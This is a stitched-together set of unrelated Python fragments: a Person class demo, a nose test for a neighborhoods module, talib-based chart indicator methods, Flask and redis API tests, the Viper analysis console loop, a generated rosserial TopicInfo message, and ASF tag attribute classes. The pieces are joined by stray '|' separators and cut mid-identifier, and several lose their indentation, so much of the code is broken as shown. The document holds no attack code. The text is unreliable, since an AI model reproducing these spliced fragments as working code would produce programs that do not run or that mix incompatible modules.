        self.first_name = first_name
        self.last_name = last_name

    def get_first_name(self):
        """Accessor kept for callers using the getter style."""
        return self.first_name

    def set_first_name(self, new_name):
        """Mutator kept for callers using the setter style."""
        self.first_name = new_name
p = Person("John", "Smith")
#p.set_first_name("FooJohn")
print p.get_first_name()
# dir() lists attributes sorted; the slice shows the last four entries.
print dir(p)[-4:]
class Single(object):
def __i |
#!/usr/bin/env python
"""
PURPOSE: The routines in this file test the get_neighborhoods module.
Created on 2015-04-02T21:24:17
"""
from __future__ import division, print_function
#import numpy as np
#from types import *
#from nose.tools import raises
#import pandas as pd
import nhrc2.backend.read_seeclickfix_api_to_csv as rscf
from nhrc2.backend import get_neighborhoods as get_ngbrhd
__author__ = "Matt Giguere (github: @mattgiguere)"
__license__ = "MIT"
__version__ = '0.0.1'
__maintainer__ = "Matt Giguere"
__email__ = "matthew.giguere@yale.edu"
__status__ = " Development NOT(Prototype or Production)"
#make sure the number of neighborhoods is equal to the number of issues.
def test_get_neighborhoods():
    """
    Ensure the number in the hood list length = the number of issues
    """
    categories = rscf.read_categories(readfile=True)
    issue_list = rscf.read_issues(categories, readfile=True)
    neighborhoods = get_ngbrhd.get_neighborhoods()
    assert len(issue_list) == len(neighborhoods)
#@raises(ValueError)
#def test_make_function_raise_value | _error():
|
AMA(self.df[self.cl].values,
timeperiod)
def add_TRIMA(self, timeperiod=20,
type='line', color='secondary', **kwargs):
"""Triangular Moving Average."""
if not self.has_close:
raise Exception()
utils.kwargs_check(kwargs, VALID_TA_KWARGS)
if 'kind' in kwargs:
type = kwargs['kind']
name = 'TRIMA({})'.format(str(timeperiod))
self.pri[name] = dict(type=type, color=color)
self.ind[name] = talib.TRIMA(self.df[self.cl].values,
timeperiod)
def add_MAMA(self, fastlimit=0.5, slowlimit=0.05,
types=['line', 'line'], colors=['secondary', 'tertiary'],
**kwargs):
"""MESA Adaptive Moving Average.
Note that the first argument of types and colors refers to MAMA while the
second argument refers to FAMA.
"""
if not self.has_close:
raise Exception()
utils.kwargs_check(kwargs, VALID_TA_KWARGS)
if 'kind' in kwargs:
kwargs['type'] = kwargs['kind']
if 'kinds' in kwargs:
types = kwargs['type']
if 'type' in kwargs:
types = [kwargs['type']] * 2
if 'color' in kwargs:
colors = [kwargs['color']] * 2
mama = 'MAMA({},{})'.format(str(fastlimit), str(slowlimit))
fama = 'FAMA({},{})'.format(str(fastlimit), str(slowlimit))
self.pri[mama] = dict(type=types[0], color=colors[0])
self.pri[fama] = dict(type=types[1], color=colors[1])
self.ind[mama], self.ind[fama] = talib.MAMA(self.df[self.cl].values,
fastlimit, slowlimit)
def add_MAVP(self, periods, minperiod=2, maxperiod=30, matype=0,
type='line', color='secondary', **kwargs):
"""Moving Average with Variable Period.
Parameters
----------
periods : Series or array
Moving Average period over timeframe to analyze, as a 1-dimensional
shape of same length as chart.
"""
if not self.has_close:
raise Exception()
utils.kwargs_check(kwargs, VALID_TA_KWARGS)
if 'kind' in kwargs:
type = kwargs['kind']
if isinstance(periods, pd.Series):
periods = periods.values
elif isinstance(periods, np.ndarray):
pass
else:
raise TypeError("Invalid periods {0}. "
"It should be Series or array."
.format(periods))
name = 'MAVP({},{})'.format(str(minperiod), str(maxperiod))
self.pri[name] = dict(type=type, color=color)
self.ind[name] = talib.MAVP(self.df[self.cl].values,
periods, minperiod, maxperiod, matype)
def add_BBANDS(self, timeperiod=20, nbdevup=2, nbdevdn=2, matype=0,
types=['line_dashed_thin', 'line_dashed_thin'],
colors=['tertiary', 'grey_strong'], **kwargs):
"""Bollinger Bands.
Note that the first argument of types and colors refers to upper and lower
bands while second argument refers to middle band. (Upper and lower are
symmetrical arguments, hence only 2 needed.)
"""
if not self.has_close:
raise Exception()
utils.kwargs_check(kwargs, VALID_TA_KWARGS)
if 'kind' in kwargs:
kwargs['type'] = kwargs['kind']
if 'kinds' in kwargs:
types = kwargs['type']
if 'type' in kwargs:
types = [kwargs['type']] * 2
if 'color' in kwargs:
colors = [kwargs['color']] * 2
name = 'BBANDS({},{},{})'.format(str(timeperiod),
str(nbdevup),
str(nbdevdn))
ubb = name + '[Upper]'
bb = name
lbb = name + '[Lower]'
self.pri[ubb] = dict(type='line_' + types[0][5:],
color=colors[0])
self.pri[bb] = dict(type='area_' + types[1][5:],
color=colors[1], fillcolor='fill')
self.pri[lbb] = dict(type='area_' + types[0][5:],
color=colors[0], fillcolor='fill')
(self.ind[ubb],
self.ind[bb],
self.ind[lbb]) = talib.BBANDS(self.df[self.cl].values,
timeperiod, nbdevup, nbdevdn, matype)
def add_HT_TRENDLINE(self,
type='line', color='secondary', **kwargs):
"""Hilert Transform Instantaneous Trendline."""
if not self.has_close:
raise Exception()
utils.kwargs_check(kwargs, VALID_TA_KWARGS)
if 'kind' in kwargs:
type = kwargs['kind']
name = 'HT_TRENDLINE'
self.pri[name] = dict(type=type, color=color)
self.ind[name] = talib.HT_TRENDLINE(self.df[self.cl].values)
def add_MIDPOINT(self, timeperiod=14,
type='line', color='secondary', **kwargs):
"""Midpoint Price over Period."""
if not self.has_close:
raise Exception()
utils.kwargs_check(kwargs, VALID_TA_KWARGS)
if 'kind' in kwargs:
type = kwargs['kind']
name = 'MIDPOINT({})'.format(str(timeperiod))
self.pri[name] = dict(type=type, color=color)
self.ind[name] = talib.MIDPOINT(self.df[self.cl].values)
def add_SAR(self, acceleration=0.02, maximum=0.20,
type='scatter', color='tertiary', **kwargs):
"""Parabolic SAR."""
if not (self.has_high and self.has_low):
raise Exception()
utils.kwargs_check(kwargs, VALID_TA_KWARGS)
if 'kind' in kwargs:
type = kwargs['kind']
name = 'SAR({},{})'.format(str(acceleration), str(maximum))
self.pri[name] = dict(type=type, color=c | olor)
self.ind[name] = talib.SAR(self.df[self. | hi].values,
self.df[self.lo].values,
acceleration, maximum)
    def add_SAREXT(self, startvalue=0, offsetonreverse=0,
                   accelerationinitlong=0.02, accelerationlong=0.02,
                   accelerationmaxlong=0.20, accelerationinitshort=0.02,
                   accelerationshort=0.02, accelerationmaxshort=0.20,
                   type='scatter', color='tertiary', **kwargs):
        """Parabolic SAR Extended."""
        # Needs both the high and low price columns.
        if not (self.has_high and self.has_low):
            raise Exception()
        utils.kwargs_check(kwargs, VALID_TA_KWARGS)
        if 'kind' in kwargs:
            type = kwargs['kind']
        # All eight tuning parameters are baked into the series name.
        name = ('SAREXT({},{},{},{},'
                '{},{},{},{})'.format(str(startvalue), str(offsetonreverse),
                                      str(accelerationinitlong),
                                      str(accelerationlong),
                                      str(accelerationmaxlong),
                                      str(accelerationinitshort),
                                      str(accelerationshort),
                                      str(accelerationmaxshort)))
        self.pri[name] = dict(type=type, color=color)
        self.ind[name] = talib.SAREXT(self.df[self.hi].values,
                                      self.df[self.lo].values,
                                      startvalue, offsetonreverse,
                                      accelerationinitlong,
                                      accelerationlong,
                                      accelerationmaxlong,
                                      accelerationinitshort,
                                      accelerationshort,
                                      accelerationmaxshort)
        # Workaround: take abs() because the computed values can come back
        # negative (see existing note).
        self.ind[name] = self.ind[name].abs() # Bug right now with negative value
# Momentum indicators
def add_APO(self, fastperiod=12, slowperiod=26, matype=0,
type='line', color='secondary', **kwargs):
"""Absolute Price Oscillator."""
if not self.has_close:
raise Exception()
utils.kwargs_check(kwargs, VALID_TA_KWARGS)
if 'kind' in kwargs:
type = kwargs['kind']
name = 'APO({}, {})'.format(str(fastperiod), str(slowperiod))
self.sec[name] = dict(type=type, color=color)
self.ind[name] = talib.APO(self.df[self.cl].values,
fastperiod, slowperiod, matype)
def add_AROON(self, timeperiod=14,
types=['line', 'line'],
colors=['increasing', 'decreasing'],
**kwargs):
"""Aroon indicators.
Note that the first argument of types and colors refers to Aroon up while
the second argument refers to Aroon down.
"""
if n |
import json
import uuid
import unittest
from main import app
from app import redis
class FlaskTestCase(unittest.TestCase):
    """Integration tests for the site/magnet HTTP API, backed by redis."""
    def setUp(self):
        app.config['TESTING'] = True
        self.app = app.test_client()
        # A fresh random host per test keeps redis keys isolated between runs.
        self.site_host = str(uuid.uuid4())
    def tearDown(self):
        pass # self.delete_site()
    def make_site(self):
        # Creating a site also creates its first magnet (id 1) -- see
        # test_create_and_destroy_site below.
        self.app.post('/site/new', data=dict(
            site=self.site_host,
            style="",
            text="test",
            x=0,
            y=0
        ))
    def delete_site(self):
        self.app.delete('/site/delete/{}'.format(self.site_host))
    def get_site_data(self):
        # Fetch and decode the JSON payload for the current site.
        response = self.app.get('/site/get/{}'.format(self.site_host))
        site_data = json.loads(response.data.decode())
        return site_data
    def test_create_and_destroy_site(self):
        def get_site_keys():
            # All redis keys that belong to this test's site.
            return set(redis.keys(self.site_host + '*'))
        # No keys before creation ...
        self.assertSetEqual(get_site_keys(), set())
        self.make_site()
        # ... and exactly these three per-site keys afterwards.
        self.assertSetEqual(get_site_keys(), {
            self.site_host,
            self.site_host + "_1",
            self.site_host + "_magnet_index",
        })
        self.assertSetEqual(set(redis.sscan_iter(self.site_host)), {"1"})
        self.delete_site()
        self.assertSetEqual(get_site_keys(), set())
    def test_add_magnet(self):
        self.make_site()
        # The magnet created by make_site is returned with its posted fields.
        self.assertDictEqual(self.get_site_data(), {
            'mags': [
                dict(
                    style="",
                    text="test",
                    x=0,
                    y=0
                )
            ],
            'ok': True
        })
    def test_remove_magnet(self):
        self.make_site()
        self.app.delete('/mag/delete', data={
            'site': self.site_host,
            'mag_id': 1
        })
        self.assertDictEqual(self.get_site_data(), {
            'mags': [],
            'ok': True
        })
    def test_move_magnet(self):
        self.make_site()
        self.app.put(
            '/mag/move',
            data=dict(site=self.site_host, mag_id=1, x=10, y=10)
        )
        # Only the coordinates change; style/text are preserved.
        self.assertDictEqual(self.get_site_data(), {
            'mags': [
                {'style': '', 'text': 'test', 'x': 10, 'y': 10}
            ],
            'ok': True
        })
if __name__ == '__main__':
    # Run the API test suite when executed directly.
    unittest.main()
|
print_output
from viper.common.colors import cyan, magenta, white, bold, blue
from viper.core.session import __sessions__
from viper.core.plugins import __modules__
from viper.core.project import __project__
from viper.core.ui.commands import Commands
from viper.core.database import Database
from viper.core.config import Config, console_output
cfg = Config()

# For python2 & 3 compat, a bit dirty, but it seems to be the least bad one.
# On Python 3 raw_input does not exist, the NameError is swallowed, and the
# builtin input is used as-is.
try:
    input = raw_input
except NameError:
    pass
def logo():
    # Print the ASCII banner, then a one-line summary of the open repository.
    print(""" _
 (_)
 _ _ _ ____ _____ ____
| | | | | _ \| ___ |/ ___)
 \ V /| | |_| | ____| |
  \_/ |_| __/|_____)_| v1.3-dev
    |_|
    """)
    db = Database()
    count = db.get_sample_count()
    try:
        db.find('all')
    except:
        # NOTE(review): bare except also swallows KeyboardInterrupt/SystemExit;
        # the message suggests this guards against an outdated DB schema.
        print_error("You need to update your Viper database. Run 'python update.py -d'")
        sys.exit()
    # Fall back to the 'default' project when none is selected.
    if __project__.name:
        name = __project__.name
    else:
        name = 'default'
    print(magenta("You have " + bold(count)) +
          magenta(" files in your " + bold(name)) +
          magenta(" repository"))
class Console(object):
def __init__(self):
# This will keep the main loop active as long as it's set to True.
self.active = True
self.cmd = Commands()
def parse(self, data):
root = ''
args = []
# Split words by white space.
words = data.split()
# First word is the root command.
root = words[0]
# If there are more words, populate the arguments list.
if len(words) > 1:
args = words[1:]
return (root, args)
def keywords(self, data):
# Check if $self is in the user input data.
if '$self' in data:
# Check if there is an open session.
if __sessions__.is_set():
# If a session is opened, replace $self with the path to
# the file which is currently being analyzed.
data = data.replace('$self', __sessions__.current.file.path)
else:
print("No open session")
return None
return data
def stop(self):
# Stop main loop.
self.active = False
def start(self):
# Logo.
logo()
# Setup shell auto-complete.
def complete(text, state):
# Try to autocomplete commands.
cmds = [i for i in self.cmd.commands if i.startswith(text)]
if state < len(cmds):
return cmds[state]
# Try to autocomplete modules.
mods = [i for i in __modules__ if i.startswith(text)]
if state < len(mods):
return mods[state]
# Then autocomplete paths.
if text.startswith("~"):
text = "{0}{1}".format(expanduser("~"), text[1:])
return (glob.glob(text+'*')+[None])[state]
# Auto-complete on tabs.
readline.set_completer_delims(' \t\n;')
readline.parse_and_bind('tab: complete')
readline.set_completer(complete)
# Save commands in history file.
def save_history(path):
readline.write_history_file(path)
# If there is an history file, read from it and load the history
# so that they can be loaded in the shell.
# Now we are storing the history file in the local project folder
history_path = os.path.join(__project__.path, 'history')
if os.path.exists(history_path):
readline.read_history_file(history_path)
# Register the save history at program's exit.
atexit.register(save_history, path=history_path)
# Main loop.
while self.active:
# If there is an open session, we include the path to the opened
# file in the shell prompt.
# TODO: perhaps this block should be moved into the session so that
# the generation of the prompt is done only when the session's
# status changes.
prefix = ''
if __project__.name:
prefix = bold(cyan(__project__.name)) + ' '
if __sessions__.is_set():
stored = ''
filename = ''
if __sessions__.current.file:
filename = __sessions__.current.file.name
if not Database().find(key='sha256', value=__sessions__.current.file.sha256):
stored = magenta(' [not stored]', True)
misp = ''
if __sessions__.current.misp_event:
misp = '[MISP'
if __sessions__.current.misp_event.event.id:
misp += ' {}'.format(__sessions__.current.misp_event.event.id)
else:
misp += ' New Event'
if __sessions__.current.misp_event.off:
misp += ' (Offline)'
misp += ']'
prompt = (prefix + cyan('viper ', True) +
white(filename, True) + blue(misp, True) + stored + cyan(' > ', True))
# Otherwise display the basic prompt.
| else:
prompt = prefix + cyan('viper > ', True)
# Wait for input from the user.
try:
data = input(prompt).strip()
except KeyboardInterrupt:
print("")
# Terminate on EOF.
except EOFError:
self.stop()
print("")
continue
# Parse the input if the user provided any.
else:
# If there are recogni | zed keywords, we replace them with
# their respective value.
data = self.keywords(data)
# Skip if the input is empty.
if not data:
continue
# Check for output redirection
# If there is a > in the string, we assume the user wants to output to file.
if '>' in data:
data, console_output['filename'] = data.split('>')
print("Writing output to {0}".format(console_output['filename'].strip()))
# If the input starts with an exclamation mark, we treat the
# input as a bash command and execute it.
# At this point the keywords should be replaced.
if data.startswith('!'):
os.system(data[1:])
continue
# Try to split commands by ; so that you can sequence multiple
# commands at once.
# For example:
# viper > find name *.pdf; open --last 1; pdf id
# This will automatically search for all PDF files, open the first entry
# and run the pdf module against it.
split_commands = data.split(';')
for split_command in split_commands:
split_command = split_command.strip()
if not split_command:
continue
# If it's an internal command, we parse the input and split it
# between root command and arguments.
root, args = self.parse(split_command)
# Check if the command instructs to terminate.
if root in ('exit', 'quit'):
self.stop()
continue
try:
# If the root command is part of the embedded commands list we
# execute it.
if root in self.cmd.commands:
self.cmd.commands[root]['obj'](*args)
del(self.cmd.output[:])
# If the root command is part of loaded modules, we initialize
# the module and execute it.
elif root in __modules__:
module = __modules__[root]['obj']()
module.set_command |
"""autogenerated by genpy from rosserial_msgs/TopicInfo.msg. Do not edit."""
import sys
python3 = True if sys.hexversion > 0x03000000 else False
import genpy
import struct
class TopicInfo(genpy.Message):
  # NOTE: autogenerated by genpy from rosserial_msgs/TopicInfo.msg --
  # comments only; do not hand-edit the generated logic.
  _md5sum = "0ad51f88fc44892f8c10684077646005"
  _type = "rosserial_msgs/TopicInfo"
  _has_header = False #flag to mark the presence of a Header object
  _full_text = """# special topic_ids
uint16 ID_PUBLISHER=0
uint16 ID_SUBSCRIBER=1
uint16 ID_SERVICE_SERVER=2
uint16 ID_SERVICE_CLIENT=4
uint16 ID_PARAMETER_REQUEST=6
uint16 ID_LOG=7
uint16 ID_TIME=10
uint16 ID_TX_STOP=11
# The endpoint ID for this topic
uint16 topic_id
string topic_name
string message_type
# MD5 checksum for this message type
string md5sum
# size of the buffer message must fit in
int32 buffer_size
"""
  # Pseudo-constants
  ID_PUBLISHER = 0
  ID_SUBSCRIBER = 1
  ID_SERVICE_SERVER = 2
  ID_SERVICE_CLIENT = 4
  ID_PARAMETER_REQUEST = 6
  ID_LOG = 7
  ID_TIME = 10
  ID_TX_STOP = 11
  __slots__ = ['topic_id','topic_name','message_type','md5sum','buffer_size']
  _slot_types = ['uint16','string','string','string','int32']
  def __init__(self, *args, **kwds):
    """
    Constructor. Any message fields that are implicitly/explicitly
    set to None will be assigned a default value. The recommend
    use is keyword arguments as this is more robust to future message
    changes. You cannot mix in-order arguments and keyword arguments.
    The available fields are:
       topic_id,topic_name,message_type,md5sum,buffer_size
    :param args: complete set of field values, in .msg order
    :param kwds: use keyword arguments corresponding to message field names
    to set specific fields.
    """
    if args or kwds:
      super(TopicInfo, self).__init__(*args, **kwds)
      #message fields cannot be None, assign default values for those that are
      if self.topic_id is None:
        self.topic_id = 0
      if self.topic_name is None:
        self.topic_name = ''
      if self.message_type is None:
        self.message_type = ''
      if self.md5sum is None:
        self.md5sum = ''
      if self.buffer_size is None:
        self.buffer_size = 0
    else:
      # No arguments: plain zero/empty defaults for every field.
      self.topic_id = 0
      self.topic_name = ''
      self.message_type = ''
      self.md5sum = ''
      self.buffer_size = 0
  def _get_types(self):
    """
    internal API method
    """
    return self._slot_types
  def serialize(self, buff):
    """
    serialize message into buffer
    :param buff: buffer, ``StringIO``
    """
    try:
      buff.write(_struct_H.pack(self.topic_id))
      # Strings are serialized as a uint32 length prefix + UTF-8 bytes.
      _x = self.topic_name
      length = len(_x)
      if python3 or type(_x) == unicode:
        _x = _x.encode('utf-8')
        length = len(_x)
      if python3:
        buff.write(struct.pack('<I%sB'%length, length, *_x))
      else:
        buff.write(struct.pack('<I%ss'%length, length, _x))
      _x = self.message_type
      length = len(_x)
      if python3 or type(_x) == unicode:
        _x = _x.encode('utf-8')
        length = len(_x)
      if python3:
        buff.write(struct.pack('<I%sB'%length, length, *_x))
      else:
        buff.write(struct.pack('<I%ss'%length, length, _x))
      _x = self.md5sum
      length = len(_x)
      if python3 or type(_x) == unicode:
        _x = _x.encode('utf-8')
        length = len(_x)
      if python3:
        buff.write(struct.pack('<I%sB'%length, length, *_x))
      else:
        buff.write(struct.pack('<I%ss'%length, length, _x))
      buff.write(_struct_i.pack(self.buffer_size))
    except struct.error as se: self._check_types(struct.error("%s: '%s' when writing '%s'" % (type(se), str(se), str(_x))))
    except TypeError as te: self._check_types(ValueError("%s: '%s' when writing '%s'" % (type(te), str(te), str(_x))))
  def deserialize(self, str):
    """
    unpack serialized message in str into this message instance
    :param str: byte array of serialized message, ``str``
    """
    try:
      end = 0
      start = end
      end += 2
      (self.topic_id,) = _struct_H.unpack(str[start:end])
      # Each string: uint32 length prefix, then that many bytes.
      start = end
      end += 4
      (length,) = _struct_I.unpack(str[start:end])
      start = end
      end += length
      if python3:
        self.topic_name = str[start:end].decode('utf-8')
      else:
        self.topic_name = str[start:end]
      start = end
      end += 4
      (length,) = _struct_I.unpack(str[start:end])
      start = end
      end += length
      if python3:
        self.message_type = str[start:end].decode('utf-8')
      else:
        self.message_type = str[start:end]
      start = end
      end += 4
      (length,) = _struct_I.unpack(str[start:end])
      start = end
      end += length
      if python3:
        self.md5sum = str[start:end].decode('utf-8')
      else:
        self.md5sum = str[start:end]
      start = end
      end += 4
      (self.buffer_size,) = _struct_i.unpack(str[start:end])
      return self
    except struct.error as e:
      raise genpy.DeserializationError(e) #most likely buffer underfill
  def serialize_numpy(self, buff, numpy):
    """
    serialize message with numpy array types into buffer
    :param buff: buffer, ``StringIO``
    :param numpy: numpy python module
    """
    try:
      buff.write(_struct_H.pack(self.topic_id))
      _x = self.topic_name
      length = len(_x)
      if python3 or type(_x) == unicode:
        _x = _x.encode('utf-8')
        length = len(_x)
      if python3:
        buff.write(struct.pack('<I%sB'%length, length, *_x))
      else:
        buff.write(struct.pack('<I%ss'%length, length, _x))
      _x = self.message_type
      length = len(_x)
      if python3 or type(_x) == unicode:
        _x = _x.encode('utf-8')
        length = len(_x)
      if python3:
        buff.write(struct.pack('<I%sB'%length, length, *_x))
      else:
        buff.write(struct.pack('<I%ss'%length, length, _x))
      _x = self.md5sum
      length = len(_x)
      if python3 or type(_x) == unicode:
        _x = _x.encode('utf-8')
        length = len(_x)
      if python3:
        buff.write(struct.pack('<I%sB'%length, length, *_x))
      else:
        buff.write(struct.pack('<I%ss'%length, length, _x))
      buff.write(_struct_i.pack(self.buffer_size))
    except struct.error as se: self._check_types(struct.error("%s: '%s' when writing '%s'" % (type(se), str(se), str(_x))))
    except TypeError as te: self._check_types(ValueError("%s: '%s' when writing '%s'" % (type(te), str(te), str(_x))))
  def deserialize_numpy(self, str, numpy):
    """
    unpack serialized message in str into this message instance using numpy for array types
    :param str: byte array of serialized message, ``str``
    :param numpy: numpy python module
    """
    try:
      end = 0
      start = end
      end += 2
      (self.topic_id,) = _struct_H.unpack(str[start:end])
      start = end
      end += 4
      (length,) = _struct_I.unpack(str[start:end])
      start = end
      end += length
      if python3:
        self.topic_name = str[start:end].decode('utf-8')
      else:
        self.topic_name = str[start:end]
      start = end
      end += 4
      (length,) = _struct_I.unpack(str[start:end])
      start = end
      end += length
      if python3:
        self.message_type = str[start:end].decode('utf-8')
      else:
        self.message_type = str[start:end]
      start = end
      end += 4
      (length,) = _struct_I.unpack(str[start:end])
      start = end
      end += length
      if python3:
        self.md5sum = str[start:end].decode('utf-8')
      else:
        self.md5sum = str[start:end]
      start = end
      end += 4
      (self.buffer_size,) = _struct_i.unpack(str[start:end])
      return self
    except struct.error as e:
      raise genpy.DeserializationError(e) #most likely buffer underfill
# Precompiled struct patterns shared by the (de)serialization code above.
_struct_I = genpy.struct_I
_struct_i = struct.Struct("<i")
_struct_H = struct.Struct("<H")
|
int):
value = ASFQWordAttribute(value)
self.append((key, value))
def keys(self):
"""Return all keys in the comment."""
return self and set(next(iter(zip(*self))))
def as_dict(self):
"""Return a copy of the comment data in a real dict."""
d = {}
for key, value in self:
d.setdefault(key, []).append(value)
return d
@total_ordering
class ASFBaseAttribute(object):
    """Generic attribute."""
    # Numeric attribute type code; overridden by each concrete subclass.
    TYPE = None
    def __init__(self, value=None, data=None, language=None,
                 stream=None, **kwargs):
        # language and stream indices are only used by the render_m/render_ml
        # serializations below.
        self.language = language
        self.stream = stream
        if data:
            # Raw bytes supplied: decode them with the subclass parser.
            # NOTE(review): an empty byte string is falsy and falls through to
            # the `value` branch -- confirm that is intended.
            self.value = self.parse(data, **kwargs)
        else:
            self.value = value
    def data_size(self):
        # Size in bytes of the rendered value; subclasses must implement.
        raise NotImplementedError
    def __repr__(self):
        # language/stream are omitted when falsy (None or 0).
        name = "%s(%r" % (type(self).__name__, self.value)
        if self.language:
            name += ", language=%d" % self.language
        if self.stream:
            name += ", stream=%d" % self.stream
        name += ")"
        return name
    def render(self, name):
        # Layout: uint16 name length, NUL-terminated UTF-16-LE name,
        # uint16 type code, uint16 data length, data bytes.
        name = name.encode("utf-16-le") + b"\x00\x00"
        data = self._render()
        return (struct_pack("<H", len(name)) + name +
                struct_pack("<HH", self.TYPE, len(data)) + data)
    def render_m(self, name):
        # Variant layout with a fixed 0 first field and the stream index;
        # booleans (TYPE == 2) are rendered without the DWORD widening.
        name = name.encode("utf-16-le") + b"\x00\x00"
        if self.TYPE == 2:
            data = self._render(dword=False)
        else:
            data = self._render()
        return (struct_pack("<HHHHI", 0, self.stream or 0, len(name),
                self.TYPE, len(data)) + name + data)
    def render_ml(self, name):
        # Same as render_m but the first field carries the language index.
        name = name.encode("utf-16-le") + b"\x00\x00"
        if self.TYPE == 2:
            data = self._render(dword=False)
        else:
            data = self._render()
        return (struct_pack("<HHHHI", self.language or 0, self.stream or 0,
                len(name), self.TYPE, len(data)) + name + data)
    def __lt__(self, other):
        # @total_ordering derives the remaining comparisons from this + __eq__.
        return self.value < other
    def __eq__(self, other):
        return self.value == other
class ASFUnicodeAttribute(ASFBaseAttribute):
    """Attribute holding a UTF-16-LE encoded text value."""

    TYPE = 0x0000

    def parse(self, data):
        # Decode, then drop the trailing NUL terminator(s).
        text = data.decode("utf-16-le")
        return text.strip("\x00")

    def _render(self):
        encoded = self.value.encode("utf-16-le")
        return encoded + b"\x00\x00"

    def data_size(self):
        # Two bytes per UTF-16 code unit plus the two-byte NUL terminator.
        return 2 * len(self.value) + 2

    def __str__(self):
        return self.value

    __hash__ = ASFBaseAttribute.__hash__
class ASFByteArrayAttribute(ASFBaseAttribute):
    """Attribute holding an opaque byte string."""

    TYPE = 0x0001

    def parse(self, data):
        # Stored verbatim; no decoding is attempted.
        return data

    def _render(self):
        return self.value

    def data_size(self):
        return len(self.value)

    def __str__(self):
        return "[binary data (%s bytes)]" % len(self.value)

    def __lt__(self, other):
        # Comparisons go through the printable form, not the raw bytes.
        return str(self) < other

    def __eq__(self, other):
        return str(self) == other

    __hash__ = ASFBaseAttribute.__hash__
class ASFBoolAttribute(ASFBaseAttribute):
    """Attribute holding a boolean, stored as a DWORD or WORD integer."""

    TYPE = 0x0002

    def parse(self, data, dword=True):
        fmt = "<I" if dword else "<H"
        return struct_unpack(fmt, data)[0] == 1

    def _render(self, dword=True):
        fmt = "<I" if dword else "<H"
        return struct_pack(fmt, int(self.value))

    def data_size(self):
        # Always reports the DWORD width.  NOTE(review): _render(dword=False)
        # emits only 2 bytes -- confirm callers use data_size() solely in the
        # DWORD context.
        return 4

    def __bool__(self):
        return self.value

    def __str__(self):
        return str(self.value)

    __hash__ = ASFBaseAttribute.__hash__
class ASFDWordAttribute(ASFBaseAttribute):
    """Attribute holding a little-endian unsigned 32-bit integer."""

    TYPE = 0x0003

    def parse(self, data):
        (number,) = struct_unpack("<L", data)
        return number

    def _render(self):
        return struct_pack("<L", self.value)

    def data_size(self):
        return 4

    def __int__(self):
        return self.value

    def __str__(self):
        return str(self.value)

    __hash__ = ASFBaseAttribute.__hash__
class ASFQWordAttribute(ASFBaseAttribute):
    """Attribute holding a little-endian unsigned 64-bit integer."""

    TYPE = 0x0004

    def parse(self, data):
        (number,) = struct_unpack("<Q", data)
        return number

    def _render(self):
        return struct_pack("<Q", self.value)

    def data_size(self):
        return 8

    def __int__(self):
        return self.value

    def __str__(self):
        return str(self.value)

    __hash__ = ASFBaseAttribute.__hash__
class ASFWordAttribute(ASFBaseAttribute):
    """Attribute holding a little-endian unsigned 16-bit integer."""

    TYPE = 0x0005

    def parse(self, data):
        (number,) = struct_unpack("<H", data)
        return number

    def _render(self):
        return struct_pack("<H", self.value)

    def data_size(self):
        return 2

    def __int__(self):
        return self.value

    def __str__(self):
        return str(self.value)

    __hash__ = ASFBaseAttribute.__hash__
class ASFGUIDAttribute(ASFBaseAttribute):
    """Attribute holding raw GUID bytes."""

    TYPE = 0x0006

    def parse(self, data):
        # Stored verbatim; no decoding is attempted.
        return data

    def _render(self):
        return self.value

    def data_size(self):
        return len(self.value)

    def __str__(self):
        return self.value

    __hash__ = ASFBaseAttribute.__hash__
# Convenience aliases for the ASF attribute type codes, usable as the
# `kind` argument to ASFValue().
UNICODE = ASFUnicodeAttribute.TYPE
BYTEARRAY = ASFByteArrayAttribute.TYPE
BOOL = ASFBoolAttribute.TYPE
DWORD = ASFDWordAttribute.TYPE
QWORD = ASFQWordAttribute.TYPE
WORD = ASFWordAttribute.TYPE
GUID = ASFGUIDAttribute.TYPE
def ASFValue(value, kind, **kwargs):
    """Create an ASF attribute of type code *kind* wrapping *value*.

    :param value: the Python value to wrap
    :param kind: one of the attribute type codes (UNICODE, BYTEARRAY, ...)
    :raises ValueError: if *kind* is not a known attribute type
    """
    # Direct dict lookup instead of the previous linear scan over
    # _attribute_types.items(); the historical ValueError is preserved.
    try:
        attr_class = _attribute_types[kind]
    except KeyError:
        raise ValueError("Unknown value type")
    return attr_class(value=value, **kwargs)
# Maps each attribute type code to its implementing class (used by ASFValue).
_attribute_types = {
    ASFUnicodeAttribute.TYPE: ASFUnicodeAttribute,
    ASFByteArrayAttribute.TYPE: ASFByteArrayAttribute,
    ASFBoolAttribute.TYPE: ASFBoolAttribute,
    ASFDWordAttribute.TYPE: ASFDWordAttribute,
    ASFQWordAttribute.TYPE: ASFQWordAttribute,
    ASFWordAttribute.TYPE: ASFWordAttribute,
    ASFGUIDAttribute.TYPE: ASFGUIDAttribute,
}
# Tag names of the Content Description object's five fields, in the order
# they appear on disk (see ContentDescriptionObject.parse/render).
_standard_attribute_names = [
    "Title",
    "Author",
    "Copyright",
    "Description",
    "Rating"
]
class BaseObject(object):
    """Base class for ASF file objects."""

    GUID = None

    def parse(self, asf, data, fileobj, size):
        # Default behaviour: keep the raw payload for later re-rendering.
        self.data = data

    def render(self, asf):
        # 16-byte GUID + uint64 total size (24-byte header included) + payload.
        header = self.GUID + struct_pack("<Q", len(self.data) + 24)
        return header + self.data
class UnknownObject(BaseObject):
    """Unknown ASF object."""
    def __init__(self, guid):
        # Per-instance GUID overrides the class attribute so the unrecognized
        # object can be re-rendered unchanged by BaseObject.render().
        self.GUID = guid
class HeaderObject(object):
    """ASF header."""
    # Byte layout of the top-level ASF header object's GUID.
    GUID = b"\x30\x26\xB2\x75\x8E\x66\xCF\x11\xA6\xD9\x00\xAA\x00\x62\xCE\x6C"
class ContentDescriptionObject(BaseObject):
    """Content description (Title/Author/Copyright/Description/Rating)."""

    GUID = b"\x33\x26\xB2\x75\x8E\x66\xCF\x11\xA6\xD9\x00\xAA\x00\x62\xCE\x6C"

    def parse(self, asf, data, fileobj, size):
        super(ContentDescriptionObject, self).parse(asf, data, fileobj, size)
        asf.content_description_obj = self
        # Header: five little-endian uint16 byte lengths, one per field.
        lengths = struct_unpack("<HHHHH", data[:10])
        texts = []
        pos = 10
        for length in lengths:
            end = pos + length
            if length > 0:
                texts.append(data[pos:end].decode("utf-16-le").strip("\x00"))
            else:
                texts.append(None)
            pos = end
        # The five fields appear in exactly the order of
        # _standard_attribute_names, so pair them up positionally.
        for key, value in zip(_standard_attribute_names, texts):
            if value is not None:
                asf.tags[key] = value

    def render(self, asf):
        def encode_field(name):
            # First tag value, NUL-terminated UTF-16-LE; empty if unset.
            values = asf.tags.get(name, [])
            if not values:
                return b""
